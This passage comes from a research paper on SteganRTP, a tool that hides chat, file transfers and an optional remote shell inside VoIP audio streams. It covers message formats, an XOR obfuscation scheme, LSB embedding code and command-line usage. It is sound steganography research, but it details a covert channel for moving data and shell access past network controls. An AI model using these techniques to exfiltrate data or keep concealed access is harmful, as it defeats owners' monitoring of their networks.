message. + +Type 2: Echo Reply + +The Echo Reply control message is used to respond to the remote SteganRTP +application's Echo Request message. The format of the Echo Reply message is +identical to the Echo Request message as described in above, however the +Control Type field's value is 2 rather than 1. + +Type 3: Resend + +The Resend control message is used to request the resending of a specified +message by the remote SteganRTP application, allowing the local application to +request missing or corrupted messages. This message is sent when the +application begins to receive messages which contain sequence numbers beyond +the next sequence number that is expected. The format +of a Resend control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 3 | 2 | Requested Seq Number | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The Control Type field's value is 3, indicating that it is a Resend control +message, and the Length field's value is 2, indicating the 2-byte control +message payload. The control message payload consists of a 16-bit Requested +Seq Number field which indicates the sequence number of the message to be +resent. + +Type 4: Start File + +The Start File control message is used to indicate to the remote application +that that local application will begin sending file data for a new file +transfer. This message is sent when the user executes the command to transfer +a file. The format of a Start File control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 4 | # | File ID | | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | +| Filename | +! ! +. . 
+ +The Control Type field's value is 4, indicating that it is a Start File +control message, and the Length field's value is 1 plus the string length, in +bytes, of the filename of the file being sent, indicating the total size of +the control message payload. The control message payload consists of an 8-bit +File ID field which indicates the sending application's unique ID value for +the file, and the Filename field is the name of the file being sent in ASCII. + +Type 5: End File + +The End File control message is used to indicate to the remote application +that that local application is finished sending file data for a particular +file transfer. This message is sent when the local application has finished +sending all data related to the open file descriptor being used to send data +from a file. The format of a End File control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 5 | 1 | File ID | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The Control Type field's value is 5, indicating that it is a End File control +message, and the Length field's value is 1, indicating the 1-byte control +message payload. The control message payload consists of an 8-bit File ID +field which indicates the sending application's unique ID value for the file +who's transfer is now complete. + +Data Messages + +Non-control messages are considered data messages and contain some form of +actual data for the user, whether it be text chat data, incoming file data, a +command for the local shell service, or a response from the remote shell +service. These various types of data are differentiated by the value of the +message header's Type field. + +Chat Data Messages + +The Chat Data Message is used to transmit text chat data between SteganRTP +applications. This type of data requires no context information, thus the +message payload contains only a single field, Chat Data. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Chat Data | +! ! +. . + +File Data Messages + +The File Data Message is used to transmit data file contents between SteganRTP +applications. Because multiple file transfers may be in progress at any given +time, this type of data must be accompanied with context information +indicating which file transfer the chunk of data belongs to. The format of a +File Data message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| File ID | File Data | ++-+-+-+-+-+-+-+-+ | +! ! +. . + +The File ID field's value is a unique file ID number chosen for the particular +file transfer taking place and is used to indicate which file transfer the +chunk of data contained in the File Data field belongs to. The File Data +field is a chunk of data from the file being transferred. The proper order +for reconstruction of the file chunks transferred by these messages is ensured +by the message header's sequence number. + +Shell Data Messages + +The Shell Input Data and Shell Output Data Messages are used to transmit shell +input to, and receive shell output from, a remote SteganRTP shell service, +respectively. This type of data requires no context information, thus the +message payload contains only a single field, Shell Data, as described by +below. 
+ + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Shell Data | +! ! +. . + +3.5) Functional Components + +3.5.1) File Descriptor Lists + +Two separate file descriptor lists are maintained; destinations for inbound +data and sources of outbound data. The data structure for storage of a file +descriptor and its data for inclusion in either list is defined +below. + +/* Structure used for file descriptor information */ +typedef struct file_info_t { + u_int8_t id; + char *name; + u_int8_t type; + int fd; + struct file_info_t *next; + struct file_info_t *prev; +} file_info; + +The independence of the file descriptor lists from the outbound data polling +and message handler components provides for a flexible and versatile +environment within which to expand functionality. In order to include new +data types for transfer, all that is required is to define a new data type ID +for both applications to correlate messages upon, open a file descriptor to +the appropriate place to read or write the data, and include the file +descriptor in the appropriate list. + +Inbound File Descriptors + +Inbound File Descriptors are a list of file descriptors for various +destinations that inbound data may be directed to. The order of these file +descriptors as included in the list is irrelevant as which file descriptor +data is destined for is looked up by matching the message type and properties +with the file descriptor's type and properties. + +Chat Interface + +Inbound chat data is written to this file descriptor. This file descriptor is +tied to the chat window of the SteganRTP ncurses interface. + +Remote Shell Interface + +Inbound shell data from the remote application's shell service is written to +this file descriptor. This file descriptor is tied to the shell window of the +SteganRTP ncurses interface. + +Local Shell Service + +Inbound shell data to the local application's shell service is written to this +file descriptor. This file descriptor is tied to the local process providing +shell access. This file descriptor does not exist in the list if the local +shell service is disabled. + +File Transfers + +Any number of file descriptors for data files being actively received may be +appended or removed from the end of the inbound file descriptors list. + +Outbound File Descriptors + +Outbound File Descriptors are polled, in order, for data waiting to be sent. +Due to being polled in order, they are essentially prioritized in that order +and data waiting to be sent from a prior descriptor in the list will have +precedence over data waiting to be sent from a latter descriptor. The file +descriptors included in the outbound list are as follows: + +Raw Message Interface + +Entire, unencrypted outbound messages are written to this file descriptor. +This file descriptor is used for the replaying of entire messages in response +to a Resend control message as described in Section 3.4.3. + +Control Message Interface + +Outbound control messages as described in Section 3.4.3 are written to this file +descriptor after creation. + +Chat Interface + +Outbound chat data is written to this file descriptor. This file descriptor +is tied to the command window of the SteganRTP ncurses interface. All +non-command text entered into the command window while in chat mode is +considered chat data. + +Remote Shell Interface + +Outbound shell data is written to this file descriptor. 
This file descriptor +is tied to the command window of the SteganRTP ncurses interface. All +non-command text entered into the command window while in shell mode is +considered shell data. + +Local Shell Service + +Outbound shell data from the local shell service is written to this file +descriptor. This file descriptor is tied to the local process providing shell +access. This file descriptor does not exist in the list if the local shell +service is disabled. + +File Transfers + +Any number of file descriptors for data files being actively sent may be +appended or removed from the end of the outbound file descriptors list. + +3.5.2) Message Handler + +The SteganRTP application's message handler receives all valid incoming +messages as verified by the RTP packet receiving system for inbound packets. +This component performs all internal state changes and administrative tasks in +response to control messages. It also handles the routing of inbound data +message payloads to the appropriate file descriptor in the inbound file +descriptors list. + +Administrative Tasks + +Echo Reply + +If an Echo Request control message is received from the remote application, +the message handler constructs an appropriate Echo Reply control message as +described in Section 3.4.3 and writes it to the Control Message Interface file +descriptor in the outbound file descriptor list. + +Start File Transfer + +If a Start File control message is received from the remote application, the +message handler opens a new file descriptor using the file's context +information contained in the control message and appends the file descriptor +to the inbound file descriptors list. + +End File Transfer + +If an End File control message is received from the remote application, the +message handler closes the file descriptor for the file transfer indicated and +removes it from the inbound file descriptors list. + + +Data Routing + +Chat Data + +Inbound text chat data is buffered until a complete line of text is received +and then is written to the Chat Interface file descriptor in the inbound file +descriptors list. A complete line of text is defined as being terminated by a +new-line character. + +File Data + +Inbound file transfer data is written to the appropriate file descriptor in +the inbound file descriptors list for the file transfer that the data belongs +to. + +Shell Input Data + +Shell Input Data messages contain input data for the local application's shell +service and is written to the Local Shell Service file descriptor in the +inbound file descriptors list. + +Shell Output Data + +Shell Output Data messages contain response data from the remote application's +shell service and is written to the Remote Shell Interface file descriptor in +the inbound file descriptors list. + +3.5.3) Encryption System + +The encryption method chosen for use in the SteganRTP reference implementation +is not really encryption at all. In favor of light-weight and speed, a simple +bitwise exclusive-or (XOR)[26] obfuscation method was chosen as a symmetric +cipher. The choice of encryption method here does not indicate that another, +more robust type of encryption could not be used; rather, the modular design +of the reference implementation promotes drop-in replacement of the current +encryption system entirely, assuming that the replacement encryption method +does not have a noticeable impact upon the latency of the overt RTP stream +being used as cover-medium. 
+
+The author does not claim that the obfuscation method used by the SteganRTP
+reference implementation is cryptographically secure. Rather, it is well
+documented in the literature that XOR against a repeating keystream is
+insecure. The obfuscation of message data is merely meant to provide some
+rudimentary protection against statistical steganalysis which focuses upon
+perceptible properties of language within the stego-medium.
+
+The XOR obfuscation method employed by the SteganRTP reference
+implementation consists of the following steps:
+
+ 1. Create a bit-pad for use as keying information.
+ 2. Choose an offset into the bit pad to begin using the keying information.
+ 3. XOR the message against the bit pad, byte by byte.
+
+Bit-pad Creation
+
+The method chosen for creation of the bit-pad is simply to duplicate the
+bit-string found in keyhash, the creation of which is described in detail
+in Section 3.3.1.
+
+Choose a Bit-pad Offset
+
+To help protect against some forms of statistical analysis that have proved
+effective against XOR obfuscation using repeated static keying information,
+it was decided against beginning every XOR loop at the same position within
+keyhash. To avoid this, a new offset into keyhash must be chosen for each
+message. The method that the SteganRTP reference implementation employs to
+determine this offset is to use the hashword[25] function to create a
+32-bit hash of keyhash and the sum of the Seq and Timestamp header fields
+of the RTP packet being embedded into. The resultant hash is then
+interpreted as a 32-bit integer. This integer, modulo 20, is the chosen
+offset into keyhash.
+
+The integer which results from the offset choosing operation, and which is
+within the range of 0 through 19, is defined here as keyhash_offset and
+described by the equation below.
+
+ keyhash_offset = hashword( keyhash, ( RTP_Seq + RTP_TS ) ) mod 20
+
+The keyhash_offset equation incorporates keyhash so as not to be entirely
+computable from observable information in the RTP packet header.
+
+XOR Loop
+
+When used as a bit-pad for the XOR operation loop, keyhash is used 8 bits,
+or 1 byte, at a time. The XOR loop begins with the first byte of the
+message to be obfuscated and the byte located at index keyhash_offset
+within keyhash. The two bytes are XORed to produce a result byte. This
+result byte is placed into the obfuscated message buffer at the same byte
+index as the original message byte. If the end of the bit-pad is reached,
+the position of the next byte in the bit-pad returns to the beginning of
+the bit-pad. When the end of the original message is reached, the
+obfuscated message buffer should be of equal length to the original message
+and have one corresponding obfuscated byte for each original byte in the
+message.
+
+It is important to note that within the scope of steganography terminology,
+whether message data is obfuscated or encrypted is irrelevant. As such, the
+obfuscated message will hereafter still be referred to as the message, or
+message data.
+
+3.5.4) Embedding System
+
+The embedding system that was developed for the SteganRTP reference
+implementation is a generalized least-significant-bit (LSB) steganographic
+data embedding method. It is generalized such that when provided with a
+cover-medium buffer, its length, the size of each word value within the
+cover-medium buffer, and the message buffer to be embedded, it is then able
+to perform the LSB embedding operation.
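+
+A minimal sketch of such a generalized LSB embedding routine is shown
+below. It is written from the description in this section rather than taken
+from the reference implementation; in particular, message bits are consumed
+least-significant-bit first and, for multi-byte samples, the sample's first
+byte is assumed to hold its least significant bit. Both are assumptions.
+
+#include <stdint.h>
+#include <stddef.h>
+
+/* Embed msg into cover by overwriting the LSB of each wordsize-byte sample.
+ * Returns the number of message bytes actually embedded. */
+static size_t lsb_embed(uint8_t *cover, size_t cover_len, size_t wordsize,
+                        const uint8_t *msg, size_t msg_len)
+{
+    size_t capacity = cover_len / (wordsize * 8);   /* message bytes that fit */
+    size_t n = (msg_len < capacity) ? msg_len : capacity;
+
+    for (size_t byte = 0; byte < n; byte++) {
+        for (size_t bit = 0; bit < 8; bit++) {
+            uint8_t b = (msg[byte] >> bit) & 1;
+            uint8_t *sample = &cover[(byte * 8 + bit) * wordsize];
+            *sample = (uint8_t)((*sample & ~1u) | b);
+        }
+    }
+    return n;
+}
+
+For G.711, wordsize is 1, so a typical 160-byte (20 ms) payload yields 20
+bytes of embedding capacity per packet, consistent with the throughput
+figures discussed earlier.
+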
In this way, any audio Codec which uses +a linear grouping of fixed-length audio samples should be able to be utilized +as cover-medium by the embedding system. + +For the purpose of discussion of the SteganRTP embedding system, the term word +value used in this context is equivalent to audio sample. The example used +here, as well as the only Codec currently supported by the reference +implementation, is G.711. G.711 is a Codec which encodes audio as a linear +grouping of 8-bit audio samples. This encoded data is transported by RTP +packets as their payload and will serve as cover-medium. + +Using the generalized LSB embedding method, the LSB of each word value in the +cover-medium is modified to be equivalent to a single bit from the message +data buffer, in order. The properties of the RTP packet, such as its payload +length and payload type header value, determine how much message data can be +embedded into the packet's payload. The RTP packet's payload size is +determined by subtracting the size of the RTP packet's header from the value +of the UDP packet header's Length field. The wordsize is equivalent to the +sample size used by the RTP packet's Codec, indicated by the RTP packet +header's payload type field. Modifying 1 bit from each word value requires 8 +word values to embed a single byte of message data. Thus, the amount of +available space within an RTP packet's payload for embedding is found by +multiplying the word value size by 8, then dividing the RTP packet payload +size by the result. + +The resultant value is defined here as the RTP packet's available_space for +embedding and is described by Equation below. + + available_space = RTP_payload_size / (wordsize * 8 ) + +The space available for user data after prepending the SteganRTP communication +protocol's message header is defined here as the SteganRTP message's +payload_size and is described by Equation below. + + + payload_size = available_space - sizeof( message_header ) + + +Thus, payload_size bytes of user data can be packaged as a SteganRTP message +and embedded into an RTP packet payload cover-medium of availablespace bytes. +If an RTP packet is too small to contain a valid message, it is passed along +unmodified. + +If a message being embedded is smaller than the available space in the +cover-medium, the message is padded out to the available size with random +data. This ensures a more uniform distribution of modified values throughout +the cover-medium. + +3.5.5) Extraction System + +All inbound RTP packets are sent to the extraction system where potential +message data is extracted, decrypted, and then verified. The extraction system +is essentially a reverse of the embedding system described in Section 3.5.4 and +then a pass through the symmetric encryption system described in Section 3.5.3. +This results in an decrypted potential message where the message's Checksum / +ID header field value can be verified to determine whether or not the extracted +potential message is valid. + +If an extracted potential message is found to be valid, it is passed to the +message handler component. + +3.5.6) Outbound Data Polling System + +File descriptors in the outbound file descriptors list are polled, in order, +for data waiting to be sent. When a file descriptor is found to have data, a +new formatted message is created if needed and data is read to fill the +payload of that message from the file descriptor. The message type is +indicated by the file descriptor's record in the outbound file descriptors +list. 
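+
+A sketch of this polling pass is shown below; it checks each descriptor in
+priority order with a zero-timeout poll() and reads from the first one that
+has data waiting. The arrays stand in for the file_info list from Section
+3.5.1, and the function name is illustrative rather than the reference
+implementation's.
+
+#include <poll.h>
+#include <unistd.h>
+#include <stddef.h>
+#include <sys/types.h>
+
+/* Returns the number of bytes read into buf (0 if nothing is waiting) and
+ * sets *msg_type from the matching descriptor's record. */
+static ssize_t poll_outbound(const int *fds, const int *types, size_t nfds,
+                             unsigned char *buf, size_t max_len, int *msg_type)
+{
+    for (size_t i = 0; i < nfds; i++) {
+        struct pollfd p = { .fd = fds[i], .events = POLLIN, .revents = 0 };
+
+        if (poll(&p, 1, 0) > 0 && (p.revents & POLLIN)) {
+            ssize_t n = read(fds[i], buf, max_len);
+            if (n > 0) {
+                *msg_type = types[i];   /* message Type from the fd's record */
+                return n;
+            }
+        }
+    }
+    return 0;   /* no data waiting: the RTP packet passes unmodified */
+}
+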
The result of this operation is a formatted SteganRTP message ready +for encryption and embedding into the cover-medium. + +3.5.7) Message Caching System + +All inbound and outbound SteganRTP messages are cached. The outbound message +cache provides a mechanism for retrieval of any given message in the event +that the remote application issues a Resend control message requesting that +the message be resent. The inbound message cache provides a mechanism for +storage of messages received that are beyond the expected sequence number. +Once the expected message is received, the others may be read back from the +cache rather than requesting that the remote application resend them. + +3.5.8) Shell Service + +The local application's shell service is essentially a child process executing +a shell. This process's standard input and output file descriptors are +replaced with file descriptors which are stored in the inbound and outbound +file descriptors lists, respectively. The local shell service is disabled by +default in the SteganRTP reference implementation and must be enabled via the +command-line. + +3.6) Use + +3.6.1) Command-line + +The SteganRTP application provides a number of command-line arguments allowing +for control and configuration of various components. The following sections +describe each in detail. + +Usage Output Overview + +The following usage output was copied verbatim from the most recent version of +the reference implementation, SteganRTP 0.3b. + +Usage: steganrtp [general options] -t -k + required options: + at least one of: + -a The "source" of the RTP session, or, host +treated as the "close" endpoint (host A) + -b The "destination" of the RTP session, or, +host treated as the "remote" endpoint (host B) + -k Shared secret used as a key to obfuscate +communications + general options: + -c Host A's RTP port + -d Host B's RTP port + -i Interface device (defaults to eth0) + -s Enable the shell service (DANGEROUS) + -v Increase verbosity (repeat for additional +verbosity) + help and documentation: + -V Print version information and exit + -e Show usage examples and exit + -h Print help message and exit + +Command-line Arguments + +The following command-line arguments are available from the SteganRTP +application's command-line. + +-a host + +host is the name or IP address of the closest side of the RTP session desired +to be utilized as cover-medium (Host A). + +-b host + +host is the name or IP address of the remote size of the RTP session desired +to be utilized as cover-medium (Host B). + +-k keyphrase + +keyphrase is a shared secret between the users of the two SteganRTP instances +which will be communicating. In some cases, a single user may be running both +instances. The keyphrase is used to generate a bit-pad via the SHA-1 hash +function which will later be used to obfuscate the data being +steganographically embedded into the RTP audio cover-data. + +-c port + +port is the RTP port used by Host A. + +-d port + +port is the RTP port used by Host B. + +-i interface + +interface is the interface to use on the local host. This parameter defaults +to "eth0". + +-s + +This argument enables the command shell service. If the command shell service +is enabled, the user of the remote instance of SteganRTP will be able to +execute commands on the local system as the user running SteganRTP. You +likely don't want this unless you are the user running both instances of +SteganRTP and intend to use the remote instance as an interface for a remote +shell on that host. 
This feature can be useful for remote administration of a +system without direct access to the system, assuming that RTP is allowed to +traverse traffic policy enforcement points. + +-v + +This argument increases the verbosity level. Repeat for higher levels of +verbosity. + +-V + +This argument prints SteganRTP's version information and exits. + +-e + +This argument prints a quick examples reference. + +-h + +This argument prints the usage (help) information and exits. + +Usage Examples + +You can print a quick reference of the following examples from the SteganRTP +command-line by using the -e command-line argument. + +The simplest command-line you can execute to successfully run SteganRTP is: + + steganrtp -k -b + +This will begin a session utilizing any RTP session involving host-b as the +destination endpoint. + + steganrtp -k -a -b -i + +This will begin a session utilizing any RTP session between host-a and host-b +using interface interface + + steganrtp -k -a -b -i -s + +This is the same as the previous example but will enable the command shell +service: + + steganrtp -k -a -b -c -d + +This will begin a session utilizing a specific RTP session between host-a on +port a-port and host-b on b-port. Note, this will effectively disable RTP +session auto-identification and will attempt to use an RTP session as +described whether it exists or not. This is useful for when an RTP session +that is desirable for utilization is already in progress as the other examples +rely on libfindrtp to identify the RTP session as it is being set up by VoIP +signaling and thus must be waiting for the call-setup. + +3.6.2) User Interface + +SteganRTP provides a curses user interface featuring four windows; the Command +window at the bottom of the screen, the large Main window in the middle of the +screen, and the Input and Output Status windows at the top of the screen. + +Windows + +Command Window + +All keyboard input, if accepted, is displayed in the Command window. Lines of +input that are not prefixed with a slash ('/') character are treated as chat +text and are sent to the remote instance of SteganRTP as such. Lines of input +that begin with a slash are considered commands and are processed by the local +instance of SteganRTP. + +Main Window + +When in Chat mode, chat text and general SteganRTP information messages and +events are displayed in the Main window. When in shell mode, this window is +overloaded with the input to and output of the shell service provided by the +remote instance of SteganRTP. + +Input Status Window + +Events related to incoming RTP packets or SteganRTP communication messages are +displayed in the Input Status window. + +Output Status Window + +Events related to output RTP packets or SteganRTP communication messages are +displayed in the Output Status window. + +Commands + +The following commands can be executed from within the Command window: + +/chat + +The "chat" command puts the interface into Chat Mode. + +/sendfile filename + +The "sendfile" command queues a file for transmission to the remote instance +of SteganRTP. filename is the path location and filename of the local file to +be sent. + +/shell + +The "shell" command puts the interface into Shell Mode. + +/quit +/exit + +The "quit" and "exit" commands exit the program. + +/help +/? + +The "help" and "?" commands print an available command list. 
+ +4) Solutions to Problems and Challenges + +The following sections describe this research effort's approach to solving +many of the problems and challenges that were identified in Section 2.3, as +implemented via the SteganRTP reference implementation. Most of the solutions +that have been devised during this research effort involved the creation of a +communications protocol to operate within the covert channel established +within the cover-medium. This protocol employs a formatted message header +which is prepended to user message data before being embedded in the +cover-medium, providing various utility to the application making use of the +protocol. + +4.1) Unreliable Transport + +To mitigate the unreliable properties of the underlying transport protocols +used to transmit the cover-medium, the message header contains a sequence +number. This sequence number coupled with the message caching system allows +the recipient to both identify when an expected message is missing as well as +request a resend of a particular message via a control message. This property +also provides the added benefit of detecting erroneously or maliciously +replayed messages. + +When considering potential solutions for this problem, various types of +Forward Error Correction (FEC) were considered. Due to the limited space +available for message data as a result of the size of cover-medium available, +the additional space required for redundant data by most algorithms considered +deemed them to be unfit for purpose within this research effort's context. + +4.2) Cover-Medium Size Limitations + +The same property of RTP which restricts the size of available cover-medium in +each packet is luckily the same property which ensures that there are an +abundance of packets being sent between RTP endpoints every second. User data +can be spread over multiple messages and cover-packets and then reassembled at +their destination. For this research effort's purposes and goals, namely the +timely transfer of user text chat, interactive shell access, and transfer of +small files, an achieved throughput of 1,000 bytes per second as described in +Section 2.2.3 was found to be more than adequate. + +4.3) Latency + +To prevent against unintended impact on RTP packet latency, care was taken to +efficiently perform a number of operations: + +4.3.1) Inbound Packet Processing + +When receiving inbound RTP packets for processing, the receiving system does +not require making any modifications to the received packet. In the SteganRTP +reference implementation, the packet is received and immediately accepted for +continued routing by the packet queue prior to extracting, decrypting, and +verifying any potential message data found within the payload. + +4.3.2) Outbound Packet Processing + +When receiving outbound RTP packets for processing, the fewest number of +operations possible must be performed in order to make a decision on whether +or not the packet should be immediately accepted for continued routing or if +it must be held for modification. In the SteganRTP reference implementation, +the packet is received and then all active outbound file descriptors are +polled for data waiting to be sent. If no data is waiting to be sent, the +packet is then accepted for continued routing by the packet queue. + +4.3.3) Encryption Overhead + +When encrypting the raw message prior to embedding into the cover-medium, a +low-overhead algorithm was used. 
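+
+Concretely, the pass described in Section 3.5.3 reduces to a per-message
+offset computation followed by a byte-wise XOR, as in the sketch below. The
+hashword() prototype comes from Bob Jenkins' lookup3.c [25] and must be
+linked in separately; exactly how the reference implementation packs the
+two hashword operands is an assumption here.
+
+#include <stdint.h>
+#include <stddef.h>
+#include <string.h>
+
+/* Provided by lookup3.c [25]; hashes an array of 32-bit words. */
+extern uint32_t hashword(const uint32_t *k, size_t length, uint32_t initval);
+
+#define KEYHASH_LEN 20                  /* 20-byte SHA-1 keyhash */
+
+/* XOR-obfuscate (or de-obfuscate) msg in place against the keyhash bit-pad,
+ * starting at the offset derived from the cover packet's Seq and Timestamp. */
+static void xor_obfuscate(uint8_t *msg, size_t msg_len,
+                          const uint8_t keyhash[KEYHASH_LEN],
+                          uint16_t rtp_seq, uint32_t rtp_ts)
+{
+    uint32_t words[KEYHASH_LEN / 4];
+    size_t offset;
+
+    memcpy(words, keyhash, sizeof(words));
+    offset = hashword(words, KEYHASH_LEN / 4, (uint32_t)rtp_seq + rtp_ts)
+             % KEYHASH_LEN;
+
+    for (size_t i = 0; i < msg_len; i++)
+        msg[i] ^= keyhash[(offset + i) % KEYHASH_LEN];
+}
+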
The SteganRTP reference implementation +employs an XOR against a SHA-1 hash of a user-supplied shared-secret. + +4.4) Tracking of RTP Streams + +Identification and tracking of RTP streams is handled by the libfindrtp C +library paired with the NetFilter libipq C library for tracking and hooking +packets. Both libraries were evaluated during this research effort's initial +requirements phase and were deemed fit for purpose. + +4.5) Media Gateway Audio Modifications + +4.5.1) Audio Codec Conversion + +Due to the nature of VoIP, it is not always possible to detect whether or not +an audio session such as RTP is terminating at the actual recipient of the +call audio or at an intermediary. As such, it is not possible to reliably +transmit stego-medium from end to end unless the actual network addresses of +each endpoint are known. Due to this limitation, the SteganRTP reference +implementation assumes that there are no intermediary devices along the media +path making changes to the RTP payload. The reference implementation makes +this assumption by also assuming that the sending and receiving applications +are either running on the same hosts as the RTP endpoint applications or are +along the network path between the two visible RTP endpoints which may or may +not be intermediaries. The reference implementation requires that these +endpoint network addresses are specified by the user or identified by the RTP +session identification component. + +4.6) Mid-session Audio Codec Change + +The SteganRTP reference implementation's embedding component addresses the +issue of mid-session audio Codec change by determining the audio sample word +size dynamically based on the Codec value supplied by the RTP packet's header. +Thus, the embedding system's parameters are derived from each individual RTP +packet that will be embedded into as cover-medium. If the RTP session were to +change Codecs mid-session, or even to change Codecs for every other packet, +the embedding system will only operate on RTP packets who's payloads are +encoded with a Codec that the embedding system recognizes and has parameters +defined for. If the embedding system does not recognize and support a +particular packet's Codec, that packet is passed unmodified. + +5) Conclusion + +5.1) Design Goals + +It is the author's belief that all of the design goals set forth in Section 3.1 +for the SteganRTP reference implementation were met. The primary goal of +steganography, establishment of a full-duplex communications channel, +compensation for the unreliable transport mechanism, identical user +experience regardless of mode of operation, and multi-type data transfer +were all accomplished. + +5.2) Identified Challenges + +It is the author's belief that all but two of the identified problems and +challenges identified in Section 2.3 were fully addressed. The two challenges +that were not addressed were the various types of media gateway audio +modifications outlined in Section 2.3.6 due to scope and the issue of compressed +audio outlined in Section 2.3.5 due to time limitations of the research effort. + +5.3) Secure Real-time Transfer Protocol + +It is important to note that use of the Secure Real-time Transfer Protocol +(SRTP) RTP profile may prevent specific operational scenarios such as the +active MITM scenario described in Section 3.2.2. Encrypting various parts of the +RTP header and RTP payload will prevent invasive modification of the payload +by an external entity to the RTP session. 
SRTP, however, won't protect +against steganographic embedding of message data prior to the application of +the SRTP encryption methods, such as may be performed within the RTP endpoint +application itself. + +5.4) Future Research + +It is the author's intention to continue this research effort at a later time. +The identified areas for continued research include: + + 1. Replacement of the generalized LSB embedding system with Codec specific + embedding algorithms. Utilizing Codec-specific properties, more intelligent + embedding methods such as the inclusion of silence and voice detection can + be performed as well as a wider variety of Codecs can be supported. + 2. Creation of embedding algorithms for video Codecs. + 3. Replacement of the XOR obfuscation system with real encryption. + 4. Addition of support for fragmentation of larger formatted messages across + multiple RTP packet payload cover-mediums. + 5. Expansion of the shell service functionality into a more generalized + services framework. + +References + +[1] J. Rosenberg, H. Schulzrinne, G. Camarillo, A. Johnston, J. Peterson, + R. Sparks, M. Handley, and E. Schooler. Sip: Session initiation protocol. + RFC 3261, Internet Society (IETF), June 2002. +[2] Wikipedia. H.323 ¿ wikipedia, the free encyclopedia. http:// + en.wikipedia.org/w/index.php?title=H.323&oldid=146577248, 2007. + [Online; accessed 2-September-2007]. +[3] Wikipedia. Skinny client control protocol ¿ wikipedia, the free + encyclopedia. http://en.wikipedia.org/w/index.php?title=Skinny + Client Control Protocol&oldid=133621770, 2007. [Online; accessed 2- + September-2007]. +[4] H. Schulzrinne, S. Casner, R. Frederick, and V. Jacobson. Rtp: A transport + protocol for real-time applications. RFC 1889, Internet Society (IETF), January + 1996. +[5] J. Postel. User datagram protocol. RFC 768, Internet Society (IETF), August + 1980. +[6] M. Baugher, D. McGrew, M. Naslund, E. Carrara, and K. Norrman. The secure + real-time transport protocol (srtp). RFC 3711, Internet Society (IETF), March + 2004. +[7] Mehdi Kharrazi, Husrev T. Sencar, and Nasir Memon. Image steganography: + Concepts and practice. Lecture Notes Series, Institute for Mathematical Sci- + ences, National University of Singapore, 2004. +[8] Huaiqing Wang and Shuozhong Wang. Cyber warfare: steganography vs. + steganalysis. Commun. ACM, 47(10):76¿82, 2004. +[9] Tayana Morkel, Jan H P Elo¿, and Martin S Olivier. An overview of im- + age steganography. In Proceedings of the Fifth Annual Information Security + South Africa Conference (ISSA2005), Sandton, South Africa, June/July 2005. + Published electronically. +[10] Unknown. S-tools 4.0. ftp://ftp.funet.fi/pub/crypt/mirrors/idea. + sec.dsi.unimi.it/code/s-tools4.zip, August 2006. +[11] Fabien A. P. Petitcolas. mp3stego. http://www.petitcolas.net/fabien/ + steganography/mp3stego/, June 2006. +[12] Heinz Repp. Hide 4 pgp. http://www.rugeley.demon.co.uk/security/ + hide4pgp.zip, December 1996. +[13] I)ruid. An analysis of voip steganography re- + search e¿orts. http://druid.caughq.org/papers/ + An-Analysis-of-VoIP-Steganography-Research-Efforts.pdf, + September 2007. +[14] I)ruid. Real-time steganography with rtp. http://druid.caughq.org/ + presentations/Real-time-Steganography-with-RTP.pdf, August 2007. +[15] Defcon 15. http://www.defcon.org/html/defcon-15/dc-15-schedule. + html, August 2007. +[16] T. Takahashi and W. Lee. An assessment of voip covert channel threats. http: + //voipcc.gtisc.gatech.edu/download/securecomm.pdf, July 2007. +[17] Wikipedia. 
